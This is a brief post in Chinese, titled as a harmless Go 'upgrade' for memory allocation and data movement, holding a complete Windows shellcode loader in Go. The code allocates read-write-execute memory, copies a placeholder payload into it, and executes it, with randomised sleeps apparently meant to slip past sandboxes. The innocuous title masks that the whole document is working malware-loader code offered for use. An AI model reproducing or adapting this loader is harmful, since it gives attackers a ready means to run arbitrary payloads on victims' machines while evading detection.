Go 代码升级：使用 syscall 库执行内存分配和数据移动

package main

import ( "syscall" "unsafe" "math/rand" "time" )

func main() { kernel32 := syscall.NewLazyDLL("kernel32.dll") virtualAlloc := kernel32.NewProc("VirtualAlloc") rtlMoveMemory := kernel32.NewProc("RtlMoveMemory")

payload := []byte{ /* insert your payload here */ }

addr, _, _ := virtualAlloc.Call(0, uintptr(len(payload)), 0x1000|0x2000, 0x40)
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500) + 1000))
_, _, _ = rtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500) + 1000))
syscall.Syscall(addr, 0, 0, 0, 0)

}